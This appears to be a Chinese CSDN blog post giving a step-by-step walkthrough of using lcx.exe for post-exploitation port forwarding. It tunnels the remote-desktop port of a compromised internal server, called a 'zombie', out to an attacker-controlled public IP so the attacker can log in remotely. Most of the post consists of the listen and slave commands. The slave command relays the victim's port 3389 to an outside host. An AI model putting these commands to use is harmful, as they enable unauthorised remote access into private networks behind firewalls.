复现过程
在提权过程中,我们经常碰到这样的情况,查询得知当前服务器存于内网中,所以无法通过mstsc来进行连接,那么这种情况下,我们就需要用到端口转发工具lcx.exe
除此之外,还需要一台拥有外网 IP 的主机。这里我们把内网的主机叫做肉鸡,独立 IP 主机叫做本机
将lcx.exe上传至本机和肉鸡之后,首先确定本机的 IP为119.90.140.191 一定要是外网ip 然后我们在本机执行:lcx.exe -listen 51 3388 。
这条命令的意思就是说,监听本机的 51 和 3388 端口,并将两个端口互相转发,端口 51 的入境流量发给端口 3388,反之亦然。其中 51 是用于肉鸡连接的端口。3388 是用于我们的远程连接客户端连接的端口,为了避免与本机的远程连接服务冲突,选择了 3388。大家可以自行选择其他未占用端口。
然后我们在肉鸡上执行:
lcx.exe -slave 119.90.140.191 51 127.0.0.1 3389 意思就是监听本机(肉鸡)3389端口转发到119.90.140.191 端口51上
这条命令连接肉鸡的 3389 端口,和本机的 51 端口,并互相转发,之后,我们在本机或其他主机上使用远程连接客户端,连接119.90.140.191:3388(或者127.0.0.1:3388)
可以看到lcx.exe中显示了转发的信息。
在这里插入图片描述
来源:CSDN
作者:cj_hydra
链接:https://blog.csdn.net/cj_Allen/article/details/104107156